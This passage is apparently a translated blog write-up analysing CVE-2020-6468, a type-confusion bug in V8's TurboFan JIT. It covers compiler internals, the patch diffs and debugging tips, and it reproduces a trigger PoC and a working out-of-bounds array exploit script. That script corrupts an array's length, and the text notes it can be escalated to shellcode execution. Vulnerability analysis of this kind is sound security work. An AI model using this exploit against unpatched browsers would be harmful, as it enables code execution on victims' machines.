class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span 
class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">Reduction <span class="title">DeadCodeElimination::ReduceDeoptimizeOrReturnOrTerminateOrTailCall</span><span class="params">(</span></span></span><br><span class="line"><span class="params"><span class="function">    Node* node)</span> </span>&#123;</span><br><span class="line">  <span class="built_in">DCHECK</span>(node-&gt;<span class="built_in">opcode</span>() == IrOpcode::kDeoptimize ||</span><br><span class="line">         node-&gt;<span class="built_in">opcode</span>() == IrOpcode::kReturn ||</span><br><span class="line">         node-&gt;<span class="built_in">opcode</span>() == IrOpcode::kTerminate ||</span><br><span class="line">         node-&gt;<span class="built_in">opcode</span>() == IrOpcode::kTailCall);</span><br><span class="line">  Reduction reduction = <span class="built_in">PropagateDeadControl</span>(node);</span><br><span class="line">  <span class="keyword">if</span> (reduction.<span class="built_in">Changed</span>()) <span class="keyword">return</span> reduction;</span><br><span class="line">  <span class="comment">// If there is a dead input, the Terminate node is rewritten into a Throw node.</span></span><br><span class="line">  <span class="comment">// With a dead input the Terminate node should never execute; reaching it means something went wrong, hence Throw</span></span><br><span class="line">  <span class="keyword">if</span> (<span class="built_in">FindDeadInput</span>(node) != <span class="literal">nullptr</span>) &#123;</span><br><span class="line">    Node* effect = NodeProperties::<span class="built_in">GetEffectInput</span>(node, <span class="number">0</span>);</span><br><span class="line">    Node* control = NodeProperties::<span class="built_in">GetControlInput</span>(node, <span class="number">0</span>);</span><br><span class="line">    <span class="keyword">if</span> (effect-&gt;<span class="built_in">opcode</span>() 
!= IrOpcode::kUnreachable) &#123;</span><br><span class="line">      effect = <span class="built_in">graph</span>()-&gt;<span class="built_in">NewNode</span>(<span class="built_in">common</span>()-&gt;<span class="built_in">Unreachable</span>(), effect, control);</span><br><span class="line">      NodeProperties::<span class="built_in">SetType</span>(effect, Type::<span class="built_in">None</span>());</span><br><span class="line">    &#125;</span><br><span class="line">    node-&gt;<span class="built_in">TrimInputCount</span>(<span class="number">2</span>);</span><br><span class="line">    node-&gt;<span class="built_in">ReplaceInput</span>(<span class="number">0</span>, effect);</span><br><span class="line">    node-&gt;<span class="built_in">ReplaceInput</span>(<span class="number">1</span>, control);</span><br><span class="line">    NodeProperties::<span class="built_in">ChangeOp</span>(node, <span class="built_in">common</span>()-&gt;<span class="built_in">Throw</span>());</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">Changed</span>(node);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> <span class="built_in">NoChange</span>();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p><strong>"A Terminate node is not an actual control-flow node."</strong> This statement may look hard to understand at first, but the answer can be found in <code>InstructionSelector::VisitNode</code> by following this call chain:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">bool</span> <span class="title">PipelineImpl::OptimizeGraph</span><span class="params">(...)</span></span></span><br><span class="line"><span class="function">  <span class="type">bool</span> 
<span class="title">PipelineImpl::SelectInstructions</span><span class="params">(...)</span></span></span><br><span class="line"><span class="function">    <span class="type">void</span> <span class="title">InstructionSelectionPhase::Run</span><span class="params">(...)</span></span></span><br><span class="line"><span class="function">      <span class="type">bool</span> <span class="title">InstructionSelector::SelectInstructions</span><span class="params">()</span></span></span><br><span class="line"><span class="function">        <span class="type">void</span> <span class="title">InstructionSelector::VisitBlock</span><span class="params">(...)</span></span></span><br><span class="line"><span class="function">          <span class="type">void</span> <span class="title">InstructionSelector::VisitNode</span><span class="params">(Node* node)</span></span></span><br></pre></td></tr></table></figure><p>In <code>VisitNode</code>, IrOpcode values such as <code>kStart</code>, <code>kLoop</code>, <code>kEffectPhi</code>, and <code>kTerminate</code> have no concrete handling, that is, no corresponding <code>VisitXXX</code> function is called for them. These no-op nodes exist in the graph only <strong>to mark certain state information</strong>. Take <code>kLoop</code> as an example: the node marks the extent of a loop, but it is never translated into machine code.</p><p>Here is the source of <code>VisitNode</code>:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span 
class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">InstructionSelector::VisitNode</span><span class="params">(Node* node)</span> </span>&#123;</span><br><span class="line">  tick_counter_-&gt;<span class="built_in">DoTick</span>();</span><br><span class="line">  <span class="built_in">DCHECK_NOT_NULL</span>(<span class="built_in">schedule</span>()-&gt;<span class="built_in">block</span>(node));  <span class="comment">// should only use scheduled nodes.</span></span><br><span class="line">  <span class="keyword">switch</span> (node-&gt;<span class="built_in">opcode</span>()) &#123;</span><br><span class="line">    <span class="keyword">case</span> IrOpcode::kStart:</span><br><span class="line">    <span class="keyword">case</span> IrOpcode::kLoop:</span><br><span class="line">    <span class="keyword">case</span> IrOpcode::kEnd:</span><br><span class="line">    <span class="keyword">case</span> IrOpcode::kBranch:</span><br><span class="line">    <span class="keyword">case</span> IrOpcode::kIfTrue:</span><br><span class="line">    <span class="keyword">case</span> IrOpcode::kIfFalse:</span><br><span class="line">    <span class="keyword">case</span> IrOpcode::kIfSuccess:</span><br><span class="line">    <span class="keyword">case</span> IrOpcode::kSwitch:</span><br><span class="line">    <span class="keyword">case</span> IrOpcode::kIfValue:</span><br><span class="line">    <span class="keyword">case</span> IrOpcode::kIfDefault:</span><br><span class="line">    <span class="keyword">case</span> IrOpcode::kEffectPhi:</span><br><span class="line">    <span class="keyword">case</span> IrOpcode::kMerge:</span><br><span class="line">    <span class="keyword">case</span> IrOpcode::kTerminate:</span><br><span class="line">    <span 
class="keyword">case</span> IrOpcode::kBeginRegion:</span><br><span class="line">      <span class="comment">// No code needed for these graph artifacts.</span></span><br><span class="line">      <span class="keyword">return</span>;</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">    <span class="keyword">case</span> IrOpcode::kFloat32Constant:</span><br><span class="line">      <span class="keyword">return</span> <span class="built_in">MarkAsFloat32</span>(node), <span class="built_in">VisitConstant</span>(node);</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">  &#125;</span><br><span class="line">  <span class="comment">// ...</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>Below is the mini PoC provided by the team that reported the vulnerability. It triggers ReduceDeoptimizeOrReturnOrTerminateOrTailCall and causes the <code>Terminate</code> node to be rewritten into a <code>Throw</code> node.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">var obj = &#123;&#125;;</span><br><span class="line"><span class="function">function <span class="title">f</span><span class="params">()</span> </span>&#123;</span><br><span 
class="line">    var var13 = <span class="keyword">new</span> <span class="built_in">Int8Array</span>(<span class="number">0</span>);</span><br><span class="line">    var13[<span class="number">0</span>] = obj;</span><br><span class="line">    <span class="function">async function <span class="title">var5</span><span class="params">()</span> </span>&#123;</span><br><span class="line">        <span class="type">const</span> var9 = &#123;&#125;;</span><br><span class="line">        <span class="keyword">while</span> (<span class="number">1</span>) &#123;</span><br><span class="line">            <span class="keyword">if</span> (abc1 | abc2)</span><br><span class="line">                <span class="keyword">while</span> (var9) &#123;</span><br><span class="line">                    await <span class="number">1</span>;</span><br><span class="line">                    <span class="built_in">print</span>(abc3);</span><br><span class="line">                &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">var5</span>();</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">f</span>());</span><br><span class="line">% <span class="built_in">PrepareFunctionForOptimization</span>(f);</span><br><span class="line"><span class="keyword">for</span> (var i = <span class="number">0</span>; i &lt; <span class="number">22</span>; i++)</span><br><span class="line">    <span class="built_in">f</span>();</span><br><span class="line">% <span class="built_in">OptimizeFunctionOnNextCall</span>(f);</span><br><span class="line"><span class="built_in">f</span>();</span><br></pre></td></tr></table></figure><p>The output is as follows:</p><blockquote><p>Note: the <code>[INFO]</code>, <code>[ERROR]</code>, and similar messages in the screenshot come from a manually applied patch.</p></blockquote><p><img src="/2021/02/CVE-2020-6468/terminate2throwInfo.png" 
alt="img"></p></li></ul><blockquote><p>This PoC is very hard to construct. The root cause is that the JIT's optimizations are complex and varied: the result of one optimization often travels through several phases before being picked up by some optimization code tucked away in a corner.</p><p>This PoC still deserves closer study.</p></blockquote><h2 id="四、漏洞利用">IV. Exploitation</h2><ul><li><p>Once the Terminate node has been replaced with a Throw node, some instructions are scheduled incorrectly in TurboFan's EffectControlLinearizationPhase. If we can <strong>write -1 to a specific position in the target object before the checkmap node</strong>, we achieve type confusion. In other words, -1 is written to that position before the target function <strong>recognizes</strong> (via the map check) that the current object is not the expected one.</p></li><li><p>Below is the out-of-bounds read exp given in the issue:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span 
class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">class</span> <span class="title class_">classA</span> &#123;</span><br><span class="line">    <span class="built_in">constructor</span>() &#123;</span><br><span class="line">        <span class="keyword">this</span>.val = <span class="number">0x4242</span>;</span><br><span class="line">        <span class="keyword">this</span>.x = <span class="number">0</span>;</span><br><span class="line">        <span class="keyword">this</span>.a = [<span class="number">1</span>, <span class="number">2</span>, <span class="number">3</span>];</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">classB</span> &#123;</span><br><span class="line">    <span class="built_in">constructor</span>() &#123;</span><br><span class="line">        <span class="keyword">this</span>.val = <span class="number">0x4141</span>;</span><br><span class="line">        <span class="keyword">this</span>.x = <span class="number">1</span>;</span><br><span class="line">        <span class="keyword">this</span>.s = <span 
class="string">&quot;dsa&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">var A = <span class="keyword">new</span> <span class="built_in">classA</span>();</span><br><span class="line">var B = <span class="keyword">new</span> <span class="built_in">classB</span>()</span><br><span class="line"></span><br><span class="line">function <span class="built_in">f</span>(arg1, arg2) &#123;</span><br><span class="line">    <span class="keyword">if</span> (arg2 == <span class="number">41</span>) &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="number">5</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    var int8arr = <span class="keyword">new</span> <span class="built_in">Int8Array</span>(<span class="number">10</span>);</span><br><span class="line">    var z = arg<span class="number">1.</span>x;</span><br><span class="line">    <span class="comment">// new arr length</span></span><br><span class="line">    arg<span class="number">1.</span>val = <span class="number">-1</span>;</span><br><span class="line">    int8arr[<span class="number">1500000000</span>] = <span class="number">22</span>;</span><br><span class="line">    <span class="function">async function <span class="title">f2</span><span class="params">()</span> </span>&#123;</span><br><span class="line">        <span class="type">const</span> nothing = &#123;&#125;;</span><br><span class="line">        <span class="keyword">while</span> (<span class="number">1</span>) &#123;</span><br><span class="line">            <span class="comment">//print(&quot;in loop&quot;);</span></span><br><span class="line">            <span class="keyword">if</span> (abc1 | abc2) &#123;</span><br><span class="line">                <span class="keyword">while</span> (nothing) &#123;</span><br><span class="line">                    await <span 
class="number">1</span>;</span><br><span class="line">                    <span class="built_in">print</span>(abc3);</span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">f2</span>();</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">var arr = <span class="keyword">new</span> <span class="built_in">Array</span>(<span class="number">10</span>);</span><br><span class="line">arr[<span class="number">0</span>] = <span class="number">1.1</span>;</span><br><span class="line"></span><br><span class="line">var i;</span><br><span class="line"><span class="comment">// this may optimize and deopt, that&#x27;s fine</span></span><br><span class="line"><span class="keyword">for</span> (i = <span class="number">0</span>; i &lt; <span class="number">20000</span>; i++) &#123;</span><br><span class="line">    <span class="built_in">f</span>(A, <span class="number">0</span>);</span><br><span class="line">    <span class="built_in">f</span>(B, <span class="number">0</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">// this will optimize it and it won&#x27;t deopt</span></span><br><span class="line"><span class="comment">// this loop needs to be less than the previous one</span></span><br><span class="line"><span class="keyword">for</span> (i = <span class="number">0</span>; i &lt; <span class="number">10000</span>; i++) &#123;</span><br><span class="line">    <span class="built_in">f</span>(A, <span class="number">41</span>);</span><br><span class="line">    <span class="built_in">f</span>(B, <span class="number">41</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">console.<span class="built_in">log</span>(<span class="string">&quot;change the arr 
length&quot;</span>);</span><br><span class="line"><span class="built_in">f</span>(arr, <span class="number">0</span>);</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;LENGTH: &quot;</span> + arr.length.<span class="built_in">toString</span>());</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;value at index 12: &quot;</span> + arr[<span class="number">12</span>].<span class="built_in">toString</span>());</span><br><span class="line"></span><br><span class="line"><span class="comment">// crash</span></span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;crash writing to offset 0x41414141&quot;</span>);</span><br><span class="line">arr[<span class="number">0x41414141</span>] = <span class="number">1.1</span>;</span><br></pre></td></tr></table></figure><p>The result of running it is shown below (note that a release build of v8 is required):</p><p><img src="/2021/02/CVE-2020-6468/oob_exp.png" alt="img"></p><p>Note the key point of this exp: function f goes through several rounds of opt and deopt, and combined with the incorrect instruction scheduling inside the function, passing in an array that is neither of type A nor of type B results in -1 being written to the array's length field.</p></li><li><p>Once we have an out-of-bounds read primitive, we can build an ArrayBuffer and overwrite its backing_store pointer, which gives an arbitrary address read/write primitive =&gt; write shellcode =&gt; execute it and get a shell. I will not expand on this part here; interested readers can refer to the earlier GoogleCTF2018 (Final) JIT write-up, which covers the remaining construction in detail.</p></li></ul><h2 id="五、后记">V. Afterword</h2><ul><li><p>The fix for the vulnerability can be found at the following links: <a href="https://chromium.googlesource.com/v8/v8.git/+/2eb04d82cc353dd0b58bbffd21ee01d498ad506c%5E%21/#F0">revision1</a> | <a href="https://chromium.googlesource.com/v8/v8.git/+/de2c0a3b2bf9922d72556a277ea2d5b648471fa6%5E%21/#F0">revision2</a>.</p><p>The new patch makes two changes:</p><ul><li><p>Remove the Terminate rewrite from DeadCodeElimination.</p><blockquote><p>Because a Terminate node is not an actual control-flow node, it must not be converted into a Throw node.</p></blockquote></li><li><p>Change the optional DCHECKs in the Schedule class member functions into mandatory CHECKs.</p><blockquote><p>The member functions of the Schedule class play an important role in rebuilding the control flow. Strengthening the checks here lowers the chance of rebuilding an abnormal control flow.</p></blockquote></li></ul><p>The diffs are as follows:</p><ul><li><p>revision1:</p><figure 
class="highlight diff"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@@ -317,7 +317,10 @@</span></span><br><span class="line">          node-&gt;opcode() == IrOpcode::kTailCall);</span><br><span class="line">   Reduction reduction = PropagateDeadControl(node);</span><br><span class="line">   if (reduction.Changed()) return reduction;</span><br><span class="line"><span class="deletion">-  if (FindDeadInput(node) != nullptr) &#123;</span></span><br><span class="line"><span class="addition">+  // Terminate nodes are not part of actual control flow, so they should never</span></span><br><span class="line"><span class="addition">+  // be replaced with Throw.</span></span><br><span class="line"><span class="addition">+  if (node-&gt;opcode() != IrOpcode::kTerminate &amp;&amp;</span></span><br><span class="line"><span class="addition">+      FindDeadInput(node) != nullptr) &#123;</span></span><br><span class="line">     Node* effect = NodeProperties::GetEffectInput(node, 0);</span><br><span class="line">     Node* control = NodeProperties::GetControlInput(node, 0);</span><br><span class="line">     if (effect-&gt;opcode() != IrOpcode::kUnreachable) &#123;</span><br></pre></td></tr></table></figure></li><li><p>revision2:</p><figure class="highlight diff"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span 
class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span 
class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@@ -218,7 +218,7 @@</span></span><br><span class="line"> &#125;</span><br><span class="line"> </span><br><span class="line"> void Schedule::AddGoto(BasicBlock* block, BasicBlock* succ) &#123;</span><br><span class="line"><span class="deletion">-  DCHECK_EQ(BasicBlock::kNone, block-&gt;control());</span></span><br><span class="line"><span class="addition">+  CHECK_EQ(BasicBlock::kNone, block-&gt;control());</span></span><br><span class="line">   block-&gt;set_control(BasicBlock::kGoto);</span><br><span class="line">   AddSuccessor(block, succ);</span><br><span class="line"> &#125;</span><br><span class="line"><span class="meta">@@ -243,7 +243,7 @@</span></span><br><span class="line"> </span><br><span class="line"> void Schedule::AddCall(BasicBlock* block, Node* call, BasicBlock* success_block,</span><br><span class="line">                        BasicBlock* exception_block) &#123;</span><br><span class="line"><span class="deletion">-  DCHECK_EQ(BasicBlock::kNone, block-&gt;control());</span></span><br><span class="line"><span class="addition">+  CHECK_EQ(BasicBlock::kNone, block-&gt;control());</span></span><br><span class="line">   DCHECK(IsPotentiallyThrowingCall(call-&gt;opcode()));</span><br><span class="line">   
block-&gt;set_control(BasicBlock::kCall);</span><br><span class="line">   AddSuccessor(block, success_block);</span><br><span class="line"><span class="meta">@@ -253,7 +253,7 @@</span></span><br><span class="line"> </span><br><span class="line"> void Schedule::AddBranch(BasicBlock* block, Node* branch, BasicBlock* tblock,</span><br><span class="line">                          BasicBlock* fblock) &#123;</span><br><span class="line"><span class="deletion">-  DCHECK_EQ(BasicBlock::kNone, block-&gt;control());</span></span><br><span class="line"><span class="addition">+  CHECK_EQ(BasicBlock::kNone, block-&gt;control());</span></span><br><span class="line">   DCHECK_EQ(IrOpcode::kBranch, branch-&gt;opcode());</span><br><span class="line">   block-&gt;set_control(BasicBlock::kBranch);</span><br><span class="line">   AddSuccessor(block, tblock);</span><br><span class="line"><span class="meta">@@ -263,7 +263,7 @@</span></span><br><span class="line"> </span><br><span class="line"> void Schedule::AddSwitch(BasicBlock* block, Node* sw, BasicBlock** succ_blocks,</span><br><span class="line">                          size_t succ_count) &#123;</span><br><span class="line"><span class="deletion">-  DCHECK_EQ(BasicBlock::kNone, block-&gt;control());</span></span><br><span class="line"><span class="addition">+  CHECK_EQ(BasicBlock::kNone, block-&gt;control());</span></span><br><span class="line">   DCHECK_EQ(IrOpcode::kSwitch, sw-&gt;opcode());</span><br><span class="line">   block-&gt;set_control(BasicBlock::kSwitch);</span><br><span class="line">   for (size_t index = 0; index &lt; succ_count; ++index) &#123;</span><br><span class="line"><span class="meta">@@ -273,28 +273,28 @@</span></span><br><span class="line"> &#125;</span><br><span class="line"> </span><br><span class="line"> void Schedule::AddTailCall(BasicBlock* block, Node* input) &#123;</span><br><span class="line"><span class="deletion">-  DCHECK_EQ(BasicBlock::kNone, block-&gt;control());</span></span><br><span 
class="line"><span class="addition">+  CHECK_EQ(BasicBlock::kNone, block-&gt;control());</span></span><br><span class="line">   block-&gt;set_control(BasicBlock::kTailCall);</span><br><span class="line">   SetControlInput(block, input);</span><br><span class="line">   if (block != end()) AddSuccessor(block, end());</span><br><span class="line"> &#125;</span><br><span class="line"> </span><br><span class="line"> void Schedule::AddReturn(BasicBlock* block, Node* input) &#123;</span><br><span class="line"><span class="deletion">-  DCHECK_EQ(BasicBlock::kNone, block-&gt;control());</span></span><br><span class="line"><span class="addition">+  CHECK_EQ(BasicBlock::kNone, block-&gt;control());</span></span><br><span class="line">   block-&gt;set_control(BasicBlock::kReturn);</span><br><span class="line">   SetControlInput(block, input);</span><br><span class="line">   if (block != end()) AddSuccessor(block, end());</span><br><span class="line"> &#125;</span><br><span class="line"> </span><br><span class="line"> void Schedule::AddDeoptimize(BasicBlock* block, Node* input) &#123;</span><br><span class="line"><span class="deletion">-  DCHECK_EQ(BasicBlock::kNone, block-&gt;control());</span></span><br><span class="line"><span class="addition">+  CHECK_EQ(BasicBlock::kNone, block-&gt;control());</span></span><br><span class="line">   block-&gt;set_control(BasicBlock::kDeoptimize);</span><br><span class="line">   SetControlInput(block, input);</span><br><span class="line">   if (block != end()) AddSuccessor(block, end());</span><br><span class="line"> &#125;</span><br><span class="line"> </span><br><span class="line"> void Schedule::AddThrow(BasicBlock* block, Node* input) &#123;</span><br><span class="line"><span class="deletion">-  DCHECK_EQ(BasicBlock::kNone, block-&gt;control());</span></span><br><span class="line"><span class="addition">+  CHECK_EQ(BasicBlock::kNone, block-&gt;control());</span></span><br><span class="line">   
block-&gt;set_control(BasicBlock::kThrow);</span><br><span class="line">   SetControlInput(block, input);</span><br><span class="line">   if (block != end()) AddSuccessor(block, end());</span><br><span class="line"><span class="meta">@@ -302,8 +302,8 @@</span></span><br><span class="line"> </span><br><span class="line"> void Schedule::InsertBranch(BasicBlock* block, BasicBlock* end, Node* branch,</span><br><span class="line">                             BasicBlock* tblock, BasicBlock* fblock) &#123;</span><br><span class="line"><span class="deletion">-  DCHECK_NE(BasicBlock::kNone, block-&gt;control());</span></span><br><span class="line"><span class="deletion">-  DCHECK_EQ(BasicBlock::kNone, end-&gt;control());</span></span><br><span class="line"><span class="addition">+  CHECK_NE(BasicBlock::kNone, block-&gt;control());</span></span><br><span class="line"><span class="addition">+  CHECK_EQ(BasicBlock::kNone, end-&gt;control());</span></span><br><span class="line">   end-&gt;set_control(block-&gt;control());</span><br><span class="line">   block-&gt;set_control(BasicBlock::kBranch);</span><br><span class="line">   MoveSuccessors(block, end);</span><br><span class="line"><span class="meta">@@ -317,8 +317,8 @@</span></span><br><span class="line"> </span><br><span class="line"> void Schedule::InsertSwitch(BasicBlock* block, BasicBlock* end, Node* sw,</span><br><span class="line">                             BasicBlock** succ_blocks, size_t succ_count) &#123;</span><br><span class="line"><span class="deletion">-  DCHECK_NE(BasicBlock::kNone, block-&gt;control());</span></span><br><span class="line"><span class="deletion">-  DCHECK_EQ(BasicBlock::kNone, end-&gt;control());</span></span><br><span class="line"><span class="addition">+  CHECK_NE(BasicBlock::kNone, block-&gt;control());</span></span><br><span class="line"><span class="addition">+  CHECK_EQ(BasicBlock::kNone, end-&gt;control());</span></span><br><span class="line">   
end-&gt;set_control(block-&gt;control());</span><br><span class="line">   block-&gt;set_control(BasicBlock::kSwitch);</span><br><span class="line">   MoveSuccessors(block, end);</span><br></pre></td></tr></table></figure></li></ul></li><li><p>A few takeaways:</p><ul><li>When debugging v8 JIT code, make sure the target function runs enough times to build up sufficient type feedback; this saves a lot of detours while debugging.</li><li>Get comfortable with the GDB <code>call</code> / <code>p</code> commands. They let you invoke the Print functions built into the relevant classes and dump a graph / node directly inside gdb, which makes debugging much easier.</li></ul></li></ul><blockquote><p>To be honest, I am still not fully satisfied with this analysis. Limited by my current skill level, I did not get to the bottom of the actual type-confusion point, so the article mainly focuses on introducing some of the optimization mechanisms in the JIT.</p></blockquote><h2 id="六、参考">VI. References</h2><ul><li><p><a href="https://bugs.chromium.org/p/chromium/issues/detail?id=1076708">Issue 1076708: OOB read/write in v8::internal::ElementsAccessorBase&lt;v8::internal::FastHoleyDoubleElementsAccessor</a></p></li><li><p>TurboFan-related</p><ul><li><p><a href="https://docs.google.com/presentation/d/1H1lLsbclvzyOF3IUR05ZUaZcqDxo7_-8f4yJoxdMooU/htmlpresent">An overview of the TurboFan compiler</a></p></li><li><p><a href="https://docs.google.com/presentation/d/1Z9iIHojKDrXvZ27gRX51UxHD-bKf1QcPzSijntpMJBM/edit#slide=id.p">Turbofan IR</a></p></li><li><p><a href="https://docs.google.com/presentation/d/1sOEF4MlF7LeO7uq-uThJSulJlTh--wgLeaVibsbb3tc/edit#slide=id.p">TurboFan JIT Design</a></p></li><li><p><a href="https://stackoverflow.com/questions/57463700/meaning-of-merge-phi-effectphi-and-dead-in-v8-terminology">Meaning of merge, phi, effectphi and dead in v8 terminology - stack overflow</a></p></li></ul></li></ul>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;一、前言&quot;&gt;I. Preface&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;CVE-2020-6468 is a JIT vulnerability in v8, located in the &lt;code&gt;DeadCodeElimination::ReduceDeoptimizeOrReturnOrTerminateOrTailCall&lt;/code&gt; function. An attacker can use it to &lt;strong&gt;trigger a type confusion&lt;/strong&gt; and &lt;strong&gt;modify the length of an array&lt;/strong&gt;, which leads to &lt;strong&gt;arbitrary out-of-bounds reads and writes&lt;/strong&gt; and can be escalated to &lt;strong&gt;RCE&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;More specifically, -1 can be written into the target object ahead of the CheckMaps node, so the array length is modified before the type of the object is checked.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;The v8 version used for testing is &lt;code&gt;8.1.307&lt;/code&gt;.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;</summary>
    
    
    
